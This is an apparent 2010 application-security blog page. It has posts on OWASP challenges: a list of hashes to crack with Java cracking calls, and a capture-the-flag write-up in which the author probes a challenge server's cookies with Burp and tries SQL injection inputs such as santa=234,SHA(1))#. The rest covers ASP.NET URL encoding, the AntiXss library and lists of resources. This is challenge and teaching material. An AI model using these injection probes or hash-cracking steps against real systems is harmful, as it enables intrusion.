//String targetHash = "FA8F46A6D347087D6980C3FA77DD4DE9";
//crackRipe();
//crackSha1();
//crackSha256();
crackGOST3411();
}
}
}
Some interview techniques
show details 12:06 PM (19 hours ago) |
Some real interviewing techniques.
http://steve.yegge.
http://www.codinghorror.com/
http://www.codinghorror.com/
I am surprised to learn that lots of programmers failing in writing simple application.
Monday, February 22, 2010
AppSec Research Challenge 9: Crack 'Em Hashes
OWASP just posted its challenge 9:
They gave a list of Hash values:
- LM(pwd1) 0C04DACA901299DBAAD3B435B51404EE
- MD2(pwd2 + pwd1) 16189F5462BF906E9D88CF6F152DE86F
- MD4(pwd3 + pwd2) FA8F46A6D347087D6980C3FA77DD4DE9
- MD5(pwd4 + pwd3) 425B33D6F60394C897B8413B5C185845
- RIPEMD160(pwd5 + pwd4) 35F34671D30472D403937820DCABC1C78C837071
- SHA1(pwd6 + pwd5) AE81A30510B2931921934218636B26A803330EB1
- SHA256(pwd7 + pwd6) B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644
- GOST3411(pwd8 + pwd7) 16CC9F1FF65688E040F5ADA82A41A258FF948769CDA4C4A17D85228A6F358971
Step 1, use Cain to crack LM(pwd1),
pwd1 = OWASP
and that's 1 point
Step 2,
Wednesday, February 10, 2010
How to test Flash Application
If you were interested into testing Flash Application. Here is good article, "A lazy Pen Tester's guide to Testing Flash Application"
How to use urlEncode to encode Request.Url?
Microsoft UrlEncode is designed to encode untrusted data within URL context. It is not meant to encode whole URL. However, sometimes, we do need to encode whole URL. Here is some codes that can do it:
String pagingUrl = string.Empty;
//get the url part without query string
pagingUrl = Request.Url.GetLeftPart(UriPartial.Path) + "?";
NameValueCollection coll = Request.QueryString;
// encode the name and values for all query strings
foreach (String key in coll.Keys)
{
pagingUrl += AntiXss.UrlEncode(key) + "=" + AntiXss.UrlEncode(coll[key]) + "&" ;
}
Monday, February 1, 2010
Application security resources
OWASP Prevention Cheat Sheet
OWASP TOP Ten Project
OWASP Code review Project
OWASP Testing Project
OWASP Development Guidance Project
CWE/SANS TOP 25 Most Dangerous Programming Errors:
Microsoft .NET security resources
Microsoft Security Center: http://msdn.microsoft.com/en-us/security/default.aspx
Securing ASP.NET Web Sites: http://msdn.microsoft.com/en-us/library/91f66yxt.aspx
Checklists:
.NET Framework 2.0: http://msdn.microsoft.com/en-us/library/aa480474.aspx
Security Code Review: http://msdn.microsoft.com/en-us/library/ms998399.aspx
Threat Modeling Web application: http://msdn.microsoft.com/en-us/library/ms978516.aspx
Guidelines:
.Net Framework 2.0: http://msdn.microsoft.com/en-us/library/aa480477.aspx
Main Security Guidance index: http://msdn.microsoft.com/en-us/library/ms998408.aspx
Building Secure ASP.NET Applications book: http://msdn.microsoft.com/en-us/library/aa302415.aspx
Threats and Countermeasures book: http://msdn.microsoft.com/en-us/library/ms994921.aspx
Creating ASP.NET Web site: http://msdn.microsoft.com/en-us/library/ywdtth2f.aspx
ASP.NET Application Life Cycle Overview for IIS 5.0 and 6.0 http://msdn.microsoft.com/en-us/library/ms178473.aspx
ASP.NET Application Life cycle Overview for IIS 7.0 http://msdn.microsoft.com/en-us/library/bb470252.aspx
ASP.NET Page Life Cycle Overview http://msdn.microsoft.com/en-us/library/ms178472.aspx
Wednesday, January 27, 2010
OWASP Challenge 7 Christmas capture flag
I missed this one during Christmas holiday. Anyway, here is the challenge
http://www.owasp.org/index.php/OWASP_AppSec_Research_2010_-_Stockholm,_Sweden#tab=Challenges
The target is http://66.249.7.26. (OWASP should do better next time, at least grabbed a domain name to look more professional)
Step 1: Visit http://66.249.7.26 and the site looks like:
http://www.owasp.org/index.php/OWASP_AppSec_Research_2010_-_Stockholm,_Sweden#tab=Challenges
The target is http://66.249.7.26. (OWASP should do better next time, at least grabbed a domain name to look more professional)
Step 1: Visit http://66.249.7.26 and the site looks like:
A look at source code reveals these messages within html comment:
Step 2: My first thought is that the bell image might hide something. Several tests showed that assumption is not true. Then, I thought about finding more pages. Wikto did not find anything interesting. DirBuster found some standard documentation pages.
Step 3: Return back to the hidden comment. "Dont forget to leave milk and cookies for santa and his helpers." Cookies! Yes, cookie. I should try cookies. By using Burp, I added a test cookie x=y into the request. The response did have something new:
Now, it is a game of cookie. Burp's repeater is perfect for this.
Cookie: santa=y generates something new:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/xmas/frontend/index.php on line 95
However "helpers" and "hishelpers" do not have any luck. Maybe, I should use his reindeer's names: Dasher, Dancer, Prancer, Vixen, Comet, Cupid, Donner, Blitzen, Rudolf. None seems to work.
Step 4: So far, we have found one cookie: santa. If we set santa=1, the error message is gone and we have something new:
YToxOntzOjIwOiJCRU5DSE1BUksoMTEsTUQ1KDEpKSI7czoxOiIwIjt9
santa=123 returns:
YToxOntzOjIyOiJCRU5DSE1BUksoMTEyMyxNRDUoMSkpIjtzOjE6IjAiO30=
They look like base64 encoding. Yes. the decoded messages are:
a:1:{s:20:"BENCHMARK(11,MD5(1))";s:1:"0";}
a:1:{s:22:"BENCHMARK(1123,MD5(1))";s:1:"0";}
From the error message in step 3, we already knew that the server is running MySQL and PHP.
According to http://dev.mysql.com/doc/refman/5.0/en/information-functions.html#function_benchmark, BENCHMARK executes the expression for specified time. For example, BENCHMARK(11,MD5(1)) means that the server will run MD5(1) for 11 times. Since our input seems to be used in SQL statement, let's try some SQL injections:
santa=123' generates old error message
santa=234,SHA(1))# does not generate any error message and we get
YToxOntzOjIyOiJCRU5DSE1BUksoMTIzNCxTSEEoMSkpIjtzOjE6IjAiO30=
and it is decoded as a:1:{s:22:"BENCHMARK(1234,SHA(1))";s:1:"0";}
Wow, it seems that we are very likely to be able to conduct SQL injection for the application. That's all for today.
Tuesday, January 26, 2010
Microsoft Anti-XSS library
If you are using ASP.NET, then Microsoft Anti-Xss library is valuable at tackling with cross site scripting issues. The latest version can be found at:
http://antixss.codeplex.com/
There is some documentations at
http://msdn.microsoft.com/en-
It also comes with new sanitization function to include "safe" html within your output.
http://blogs.msdn.com/
Lots of people asked the same question "why do not we just use HttpUtility.htmlEnocde?". The Differences between AntiXss.htmlEncode and HttpUtility.HtmlEncode are:
- AntiXss.htmlEncode uses white list approach while HttpUtility.HtmlEncode uses black list
- AntiXss.htmlEncode supports more languages
- AntiXss.htmlEncode is designed for defeat XSS while HttpUtility.HtmlEncode is designed to generate safe html.
- Performance difference.
The details can be found at http://blogs.msdn.com/
Subscribe to:
Comments (Atom)